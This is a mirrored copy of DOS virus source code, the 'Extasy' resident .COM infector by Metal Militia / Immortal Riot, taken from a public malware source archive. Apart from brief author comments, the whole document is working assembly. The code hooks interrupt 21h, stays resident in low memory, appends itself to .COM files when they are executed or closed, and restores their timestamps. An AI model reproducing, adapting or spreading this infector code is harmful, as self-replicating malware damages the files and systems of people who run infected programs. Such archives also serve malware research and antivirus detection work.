mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-18 17:36:11 +00:00
197 lines
4.3 KiB
NASM
197 lines
4.3 KiB
NASM
; Virusname: Extasy
|
|
; Origin: Sweden
|
|
; Author: Metal Militia
|
|
|
|
; This virus can be found with any anti-virus program, since it's been
|
|
; around for a while now. (SCAN/TB-SCAN/F-PROT/SOLOMON that is..)
|
|
;
|
|
; It's a resident .COM infector, without any encryption or stealth
|
|
; capabilities. It infects when you execute (4bh) or closes (3eh).
|
|
; This virus looks pretty much like RAVAGE, since it's pretty much
|
|
; alike except for that RAVAGE infects .EXE files too.
|
|
;
|
|
; I stopped with this virus since it's so totally buggy that you'll find
|
|
; it almost at once. This is the reason why i give you the source code.
|
|
; In my later resident things, there will be such things as encryption,
|
|
; stealth etc. i think..
|
|
|
|
|
|
.model tiny
|
|
.code
|
|
.radix 16
|
|
.code
|
|
|
|
viruslength = heap - _small
|
|
startload = 90 * 4
|
|
|
|
_small:
|
|
call relative
|
|
oldheader dw 020cdh
|
|
dw 0bh dup (0)
|
|
relative:
|
|
pop bp
|
|
push ds
|
|
push es
|
|
xor ax,ax
|
|
mov ds,ax
|
|
mov es,ax
|
|
mov di,startload
|
|
cmp word ptr ds:[di+25],di
|
|
jz exit_small
|
|
|
|
lea si,[bp-3]
|
|
mov cx,viruslength
|
|
db 2Eh
|
|
rep movsb
|
|
|
|
mov di,offset old21 + startload
|
|
mov si,21*4
|
|
push si
|
|
movsw
|
|
movsw
|
|
pop di
|
|
mov ax,offset int21 + startload
|
|
stosw
|
|
xchg ax,cx
|
|
stosw
|
|
|
|
exit_small:
|
|
pop es
|
|
pop ds
|
|
|
|
or sp,sp
|
|
jnp returnCOM
|
|
|
|
returnGNU:
|
|
returnCOM:
|
|
mov di,100
|
|
push di
|
|
mov si,bp
|
|
movsw
|
|
movsb
|
|
ret
|
|
|
|
infect:
|
|
push ax
|
|
push bx
|
|
push cx
|
|
push dx
|
|
push si
|
|
push di
|
|
push ds
|
|
push es
|
|
|
|
mov ax,3d02
|
|
int 21
|
|
xchg ax,bx
|
|
|
|
push cs
|
|
pop ds
|
|
push cs
|
|
pop es
|
|
|
|
mov ax,5700h
|
|
int 21h
|
|
|
|
push cx
|
|
push dx
|
|
|
|
mov si,offset oldheader+startload
|
|
|
|
mov ah,3f
|
|
mov cx,18
|
|
push cx
|
|
mov dx,si
|
|
int 21
|
|
|
|
cmp ax,cx
|
|
jnz go_already_infected
|
|
|
|
mov di,offset target + startload
|
|
push di
|
|
rep movsb
|
|
pop di
|
|
|
|
mov ax,4202
|
|
cwd
|
|
int 21
|
|
|
|
cmp ds:[di],'ZM'
|
|
jz infectNOT
|
|
cmp ds:[di],'MZ'
|
|
jz infectNOT
|
|
|
|
sub ax,3
|
|
mov byte ptr ds:[di],0e9
|
|
mov ds:[di+1],ax
|
|
|
|
sub ax,viruslength
|
|
cmp ds:[si-17],ax
|
|
jnz finishinfect
|
|
|
|
go_already_infected:
|
|
pop cx
|
|
jmp short already_infected
|
|
|
|
db "EXTASY!"
|
|
db "(c) Metal Militia / Immortal Riot"
|
|
|
|
int21:
|
|
cmp ax,4b00
|
|
jz kewl
|
|
cmp ax,3e00
|
|
jnz oops
|
|
mov ah,45
|
|
int 21
|
|
jmp kewl
|
|
|
|
oops:
|
|
jmp chain
|
|
|
|
infectNOT:
|
|
jmp go_already_infected
|
|
|
|
kewl:
|
|
jmp infect
|
|
|
|
finishinfect:
|
|
mov cx,viruslength
|
|
mov dx,startload
|
|
mov ah,40
|
|
int 21
|
|
|
|
mov ax,4200
|
|
xor cx,cx
|
|
cwd
|
|
int 21
|
|
|
|
mov ah,40
|
|
mov dx,di
|
|
pop cx
|
|
int 21
|
|
already_infected:
|
|
pop dx
|
|
pop cx
|
|
|
|
mov ax,5701h
|
|
int 21h
|
|
|
|
mov ah,3e
|
|
int 21
|
|
exitinfect:
|
|
pop es
|
|
pop ds
|
|
pop di
|
|
pop si
|
|
pop dx
|
|
pop cx
|
|
pop bx
|
|
pop ax
|
|
chain:
|
|
db 0ea
|
|
heap:
|
|
old21 dw ?, ?
|
|
target dw 0ch dup (?)
|
|
|
|
endheap:
|
|
end _small |